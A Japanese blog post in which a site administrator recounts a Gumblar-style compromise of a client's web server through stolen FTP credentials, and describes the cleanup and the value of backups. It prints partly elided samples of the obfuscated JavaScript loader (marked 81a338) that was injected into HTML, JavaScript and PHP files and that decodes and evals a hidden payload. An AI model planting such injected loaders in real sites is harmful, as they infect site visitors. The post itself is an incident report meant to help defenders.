WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

レビュー メルマガ配信システム プロファイル スムーズ 与沢翼×蝶乃舞 インターネットビジネススクール WP KMS認証 IP 流出 加工 MovableTYpe WEB ヤフー MT MasterCollection 無料 .htaccess Adobe ライオンアフィリエイト コピーボタン SKナレッジ 詐欺 バナー 自動化 functions.php エディタ 百度 ブロックポリシー 株式会社Free Agent Style 量産 SmoothScroll.js ざくざく君 Baidu ECサイト DTD XHTML 伊藤塾 Windows 新井浩 Chrome グラデーション 山下 株式会社SRシステム ping 掲示板 Ban Hammer 株式会社A-ブログレス 大園式転売塾 explorer アフィリエイト KMSpico 土屋ひろし DOCTYPE 石井匠 SyntaxHighlighter Line ツイッター ブラクラ バイマ document.all BBIZ SEO moza ネットガレージ 管理画面 バイドゥー getElementByTagName IBS ネットゲーム Google Maps API インターネット 情報商材 出店料 RMT スクロール @PAGES css ブロック FTP フォローマティック 大園麗花 ライブチャット 自動 wordpress JavaScript Youtube 既得権益 画像 伊藤 歩 無料オファー office 個人情報流出 RSS Includes Pages 伊藤 虎太郎 がら空きビジネス クロスアフィリエイト アレックス式ネオせどりスクール 久積篤史 バックアップ ウインドウ 復元 IE 優先順位 ブラウザ 小笠原健一 android 不正送信 クラウド変換 Favicon サンタ プラグイン アンダーグラウンドアフィリエイトクラブ ユーチューブマニアクス2017 株式会社SRシステム 関根義光 プロモーション スタイルシート 上位表示 セキュリティ iphone 切抜き Agency Business 加藤 秀吉 ヤフオク 賢威 HTML4.0 ネットショップ ビジネス 三橋美仁 原田真 申請金ビジネス アイコン CGI 権利収入 PPC ネットビジネス最後の楽園 無断送信 トラフィック スマホ 人物 ムーバブルタイプ 脆弱性 不労所得の神 トレンドキーワード ソフト ソースコード 音量アイコン ボタン RSS パズル 比較 エクスチェンジ ブラシ google 立体 モザイク 放射線 High Concept Marketing 大園転売塾 EC 切り抜き インターネットエクスプローラー クラウド入力機能 Diamond Affiliate Masters Program 登録禁止 FireWorks 固定ページ レンタルサーバー 副業術 テンプレート 株式会社ニュース 大西良幸 アクセスアップ system BUYMA twitter 高速ゲーム マイクロソフト アクセス制限 個人情報 ネオヒルズアカデミー 背景 転売大園塾 ヤフーショッピング force puzzle 蝶乃舞 レタープレス getElementById 特定のメールアドレス 不正アクセス 株式会社WINGOOD ライン 株式会社バンザイ リンクシェイカー html 村上省吾 詐欺組織 タスクバー Tiger-Wing カスタマイズ ネットビジネス 池田純矢 YouTube Maniax 2017 Google Maps wpXサーバー シャンプー Yahoo 表示 改竄 ロリポップ wp-login.php Wordpress Content Slide Newpost Catch やしろひろたみ 伊藤虎太郎 ネットビジネス大全集 アレックス Extension Manager タイガーウイング インフォトップ 短縮URL 感染 エクスプローラー Cash on Wordpress ツール Firefox 日本語入力変換ソフト スカイプ tool ワードプレス 短縮URLツール LinkShaker クリックランキング フレンドシップメール Thunderbird テーマ PHP せどり レイアウト崩れ 自己アフィリエイト 球体 定型文 ソース インペリアルゴールド トレンドアフィリエイト マルウエア 高額塾 アドセンス 自己アフィリ エキスパートメール 管理ツール ドメイン やしろ塾 Windows 7 followmatic デスクトップ 特権ビジネス postpost 滑らか メモ ファビコン アフィ匠 CS6 ランキング ping送信 Internet Explorer 81a338 宮田麗花 ウイルス 北川 雅嗣 秀吉塾天下統一 関根塾 中山秀人 サイト改ざん Login LockDown 改ざん マニュアル もざ ブルートフォースアタック 配布 レイアウト クラック ぼかし 到達率 秒速で1億円稼ぐ男 与沢翼 ハート CS5 アンダーグラウンドメソッド

アーカイブ

エステトラブル

このページの先頭へ